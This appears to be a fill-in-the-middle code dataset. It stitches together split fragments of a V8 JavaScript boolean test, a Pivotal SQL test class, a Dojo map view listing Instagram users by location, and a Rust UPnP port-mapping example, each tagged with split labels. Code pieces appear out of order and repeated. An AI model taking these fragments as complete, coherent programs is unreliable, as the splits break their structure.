// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
assertEquals(Boolean(void 0), false);
assertEquals(Boolean(null), false);
assertEquals(Boolean(false), false);
assertEquals(Boolean(true), true);
assertEquals(Boolean(0), false);
assertEquals(Boolean(1), true);
assertEquals(Boolean(assertEquals), true);
assertEquals(Boolean(new Object()), true);
assertTrue(new Boolean(false) !== false);
assertTrue(new Boolean(false) == false);
assertTrue(new Boolean(true) !== true);
assertTrue(new Boolean(true) == true);
assertEquals(true, !false);
assertEquals(false, !true);
assertEquals(true, !!true);
assertEquals(false, !!false);
assertEquals(true, true ? true : false);
assertEquals(false, false ? true : false);
assertEquals(false, true ? false : true);
assertEquals(true, false ? false : true);
assertEquals(true, true && true);
assertEquals(false, true && false);
assertEquals(false, false && true);
assertEquals(false, false && false);
// Regression.
var t = 42;
assertEquals(void 0, t.p);
assertEquals(void 0, t.p && true);
assertEquals(void 0, t.p && false);
assertEquals(void 0, t.p && (t.p == 0));
assertEquals(void 0, t.p && (t.p == null));
assertEquals(void 0, t.p && (t.p == t.p));
var o = new Object();
o.p = 'foo';
assertEquals('foo', o.p);
assertEquals('foo', o.p || true);
assertEquals('foo', o.p || false);
assertEquals('foo', o.p || (o.p == 0));
assertEquals('foo', o.p || (o.p == null));
assertEquals('foo', o.p || (o.p == o.p));
// JSToBoolean(x:string)
function | (x) { return !!("" + x); }
assertEquals(false, f(""));
assertEquals(true, f("narf"));
assertEquals(true, f(12345678));
assertEquals(true, f(undefined));
| f | identifier_name |
boolean.js | // Copyright 2011 the V8 project authors. All rights reserved. | //
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following
// disclaimer in the documentation and/or other materials provided
// with the distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived
// from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
assertEquals(Boolean(void 0), false);
assertEquals(Boolean(null), false);
assertEquals(Boolean(false), false);
assertEquals(Boolean(true), true);
assertEquals(Boolean(0), false);
assertEquals(Boolean(1), true);
assertEquals(Boolean(assertEquals), true);
assertEquals(Boolean(new Object()), true);
assertTrue(new Boolean(false) !== false);
assertTrue(new Boolean(false) == false);
assertTrue(new Boolean(true) !== true);
assertTrue(new Boolean(true) == true);
assertEquals(true, !false);
assertEquals(false, !true);
assertEquals(true, !!true);
assertEquals(false, !!false);
assertEquals(true, true ? true : false);
assertEquals(false, false ? true : false);
assertEquals(false, true ? false : true);
assertEquals(true, false ? false : true);
assertEquals(true, true && true);
assertEquals(false, true && false);
assertEquals(false, false && true);
assertEquals(false, false && false);
// Regression.
var t = 42;
assertEquals(void 0, t.p);
assertEquals(void 0, t.p && true);
assertEquals(void 0, t.p && false);
assertEquals(void 0, t.p && (t.p == 0));
assertEquals(void 0, t.p && (t.p == null));
assertEquals(void 0, t.p && (t.p == t.p));
var o = new Object();
o.p = 'foo';
assertEquals('foo', o.p);
assertEquals('foo', o.p || true);
assertEquals('foo', o.p || false);
assertEquals('foo', o.p || (o.p == 0));
assertEquals('foo', o.p || (o.p == null));
assertEquals('foo', o.p || (o.p == o.p));
// JSToBoolean(x:string)
function f(x) { return !!("" + x); }
assertEquals(false, f(""));
assertEquals(true, f("narf"));
assertEquals(true, f(12345678));
assertEquals(true, f(undefined)); | // Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met: | random_line_split |
test_triggersqls.py | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
'''
Trigger sqls for create_tests
'''
class TestTriggerSQLClass(SQLTestCase):
'''
This class contains all the sqls that are part of the trigger phase
The sqls in here will get suspended by one of the faults that are triggered in the main run
@gpdiff False
'''
sql_dir = 'sql/'
@classmethod
def setUpClass(cls):
| """
Since some operation in this scenario is blocked, we want to run
only aimed SQLs without unexpected setup. Just make this no-op.
"""
pass | identifier_body |
|
test_triggersqls.py | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
'''
Trigger sqls for create_tests
'''
class TestTriggerSQLClass(SQLTestCase):
'''
This class contains all the sqls that are part of the trigger phase
The sqls in here will get suspended by one of the faults that are triggered in the main run
@gpdiff False
'''
sql_dir = 'sql/'
@classmethod
def | (cls):
"""
Since some operation in this scenario is blocked, we want to run
only aimed SQLs without unexpected setup. Just make this no-op.
"""
pass
| setUpClass | identifier_name |
test_triggersqls.py | """
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mpp.models import SQLTestCase
'''
Trigger sqls for create_tests | class TestTriggerSQLClass(SQLTestCase):
'''
This class contains all the sqls that are part of the trigger phase
The sqls in here will get suspended by one of the faults that are triggered in the main run
@gpdiff False
'''
sql_dir = 'sql/'
@classmethod
def setUpClass(cls):
"""
Since some operation in this scenario is blocked, we want to run
only aimed SQLs without unexpected setup. Just make this no-op.
"""
pass | ''' | random_line_split |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == ""){
this.item.set("rightText", "You must enter a location");
}else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
})
})
},
buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function toggleBounce() |
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | {
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
} | identifier_body |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == ""){
this.item.set("rightText", "You must enter a location");
}else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
})
})
},
buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function | (){
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
}
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | toggleBounce | identifier_name |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == "") | else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
})
})
},
buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function toggleBounce(){
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
}
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | {
this.item.set("rightText", "You must enter a location");
} | conditional_block |
MainView.js | /****************************************************************************
** Acilos app: https://github.com/omnibond/acilos
** Copyright (C) 2014 Omnibond Systems LLC. and/or its subsidiary(-ies).
** All rights reserved.
** Omnibond Systems - www.omnibond.com for Acilos.com
**
** This file defines the mainView for the locateMe module
** This is DEPRECATED
**
** $QT_BEGIN_LICENSE:LGPL$
**
** GNU Lesser General Public License Usage
** Alternatively, this file may be used under the terms of the GNU Lesser
** General Public License version 2.1 as published by the Free Software
** Foundation and appearing in the file LICENSE.LGPL included in the
** packaging of this file. Please review the following information to
** ensure the GNU Lesser General Public License version 2.1 requirements
** will be met: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
**
**
** If you have questions regarding the use of this file, please contact
** Omnibond Systems - www.omnibond.com
**
** $QT_END_LICENSE$
*/
define(['dojo/_base/declare',
'dojo-mama/views/ModuleScrollableView',
'dojo/dom-construct',
'dojo/topic',
"dojo/_base/lang",
'dojo/on',
'dojo/dom-geometry',
'app/util/xhrManager',
'app/TitleBar',
"app/SelRoundRectList",
"dojox/mobile/Button",
"dojox/mobile/ListItem",
"dojox/mobile/ToolBarButton",
"dojox/mobile/EdgeToEdgeCategory",
"dojox/mobile/Heading",
"dojox/mobile/TextBox"
], function(
declare,
ModuleScrollableView,
domConstruct,
topic,
lang,
on,
domGeom,
xhrManager,
TitleBar,
RoundRectList,
Button,
ListItem,
ToolBarButton,
EdgeToEdgeCategory,
Heading,
TextBox
) {
return declare([ModuleScrollableView], {
buildMap: function(){
this.holder = domConstruct.create('div', {style:"width:500px;height:500px;margin-left:10px;margin-top:10px"}); //Was originally 200px by 200px
this.domNode.appendChild(this.holder);
this.mapDiv = domConstruct.create('div', {id:"map-canvas", style:"width:100%;height:100%"});
this.holder.appendChild(this.mapDiv);
},
buildList: function(){
this.mainList = new RoundRectList({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.instaListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.locationListItem = new ListItem({
variableHeight: true,
"class": "borderlessListItemClass"
});
this.buildInstagramAroundMeButton();
this.buildLocationBox();
this.mainList.addChild(this.instaListItem);
this.mainList.addChild(this.locationListItem);
this.instaListItem.addChild(this.instaAroundButton);
this.locationListItem.addChild(this.locationBox);
this.addChild(this.mainList);
},
buildInstagramAroundMeButton: function(){
this.instaAroundButton = new ToolBarButton({
label: "Show Instagram users in area",
style: "margin-left:10px;margin-top:10px",
clickable: true,
onClick: lang.hitch(this, function(){
console.log("CLICK");
if(this.locationBox.get("value") == ""){
this.item.set("rightText", "You must enter a location");
}else{
var loc = this.locationBox.get("value");
var location = loc.replace(" ", "+");
//anything that gets put after the function in lang.hitch moves all args down one and puts itself at the begining.
//so now obj will be the SECOND param and "Foursquare" will be the first
this.getAroundMe("InstagramLocal", location).then(lang.hitch(this, this.populate, "InstagramLocal"));
}
}) | buildLocationBox: function(){
this.locationBox = new TextBox({
placeHolder: "Enter a location",
style: "margin-left:9px"
})
},
populate: function(call, obj){
for(var f = 0; f < obj.length; f++){
if(call == "InstagramLocal"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['user']['username']);
}else if(call == "Foursquare"){
this.addMarkerWithClick(obj[f]['latlng'], obj[f]['name']);
}
}
},
addMarkerWithClick: function(marker, name){
var markerArray = [];
var image = {
url: 'app/locateUsers/google_earth.png',
// This marker is 256 pixels wide by 256 pixels tall.
size: new google.maps.Size(24, 24),
// The origin for this image is 0,0.
origin: new google.maps.Point(0,0),
// The anchor for this image is the base of the flagpole at 0,32.
anchor: new google.maps.Point(12, 12)
};
var shape = {
coord: [1, 1, 1, 20, 18, 20, 18 , 1],
type: 'poly'
};
var arr = marker.split("#");
var latlng = new google.maps.LatLng(arr[0], arr[1]);
var marker = new google.maps.Marker({
position: latlng,
title: name,
//draggable: true,
icon: image,
animation: google.maps.Animation.DROP
})
google.maps.event.addListener(marker, 'click', toggleBounce, function(event){
console.log("clicked", name);
});
markerArray.push(marker);
marker.setMap(this.map);
function toggleBounce(){
if(marker.getAnimation() != null){
marker.setAnimation(null);
}else{
marker.setAnimation(google.maps.Animation.BOUNCE);
}
}
},
initialize: function() {
var latlng = new google.maps.LatLng(39, -106);
var mapOptions = {
zoom: 3,
center: latlng,
mapTypeId: google.maps.MapTypeId.ROADMAP
}
this.map = new google.maps.Map(this.mapDiv, mapOptions);
//google.maps.event.trigger(this.map, "resize");
},
postCreate: function(){
if(this.mainList){
this.mainList.destroyRecursive();
this.mainList = null;
this.buildList();
}else{
this.buildList();
}
this.buildMap();
this.initialize();
},
activate: function(e){
topic.publish("/dojo-mama/updateSubNav", {back: '/analytics', title: "User Locations"} );
}
})
}); | })
},
| random_line_split |
aio.rs | //! IGD async API example.
//!
//! It demonstrates how to:
//! * get external IP
//! * add port mappings
//! * remove port mappings
//!
//! If everything works fine, 2 port mappings are added, 1 removed and we're left with single
//! port mapping: External 1234 ---> 4321 Internal
use std::env;
use std::net::SocketAddrV4;
use igd::aio::search_gateway;
use igd::PortMappingProtocol;
use simplelog::{Config as LogConfig, LevelFilter, SimpleLogger};
#[tokio::main]
async fn main() | {
let ip = match env::args().nth(1) {
Some(ip) => ip,
None => {
println!("Local socket address is missing!");
println!("This example requires a socket address representing the local machine and the port to bind to as an argument");
println!("Example: target/debug/examples/io 192.168.0.198:4321");
println!("Example: cargo run --features aio --example aio -- 192.168.0.198:4321");
return;
}
};
let ip: SocketAddrV4 = ip.parse().expect("Invalid socket address");
let _ = SimpleLogger::init(LevelFilter::Debug, LogConfig::default());
let gateway = match search_gateway(Default::default()).await {
Ok(g) => g,
Err(err) => return println!("Faild to find IGD: {}", err),
};
let pub_ip = match gateway.get_external_ip().await {
Ok(ip) => ip,
Err(err) => return println!("Failed to get external IP: {}", err),
};
println!("Our public IP is {}", pub_ip);
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 1234, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 2345, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if gateway.remove_port(PortMappingProtocol::TCP, 2345).await.is_err() {
println!("Port mapping was not successfully removed");
} else {
println!("Port was removed.");
}
} | identifier_body |
|
aio.rs | //! IGD async API example.
//!
//! It demonstrates how to:
//! * get external IP
//! * add port mappings
//! * remove port mappings
//!
//! If everything works fine, 2 port mappings are added, 1 removed and we're left with single
//! port mapping: External 1234 ---> 4321 Internal
use std::env;
use std::net::SocketAddrV4;
use igd::aio::search_gateway;
use igd::PortMappingProtocol;
use simplelog::{Config as LogConfig, LevelFilter, SimpleLogger};
#[tokio::main]
async fn | () {
let ip = match env::args().nth(1) {
Some(ip) => ip,
None => {
println!("Local socket address is missing!");
println!("This example requires a socket address representing the local machine and the port to bind to as an argument");
println!("Example: target/debug/examples/io 192.168.0.198:4321");
println!("Example: cargo run --features aio --example aio -- 192.168.0.198:4321");
return;
}
};
let ip: SocketAddrV4 = ip.parse().expect("Invalid socket address");
let _ = SimpleLogger::init(LevelFilter::Debug, LogConfig::default());
let gateway = match search_gateway(Default::default()).await {
Ok(g) => g,
Err(err) => return println!("Faild to find IGD: {}", err),
};
let pub_ip = match gateway.get_external_ip().await {
Ok(ip) => ip,
Err(err) => return println!("Failed to get external IP: {}", err),
};
println!("Our public IP is {}", pub_ip);
if let Err(e) = gateway
.add_port(PortMappingProtocol::TCP, 1234, ip, 120, "rust-igd-async-example")
.await
{
println!("Failed to add port mapping: {}", e);
}
println!("New port mapping was successfully added.");
if let Err(e) = gateway
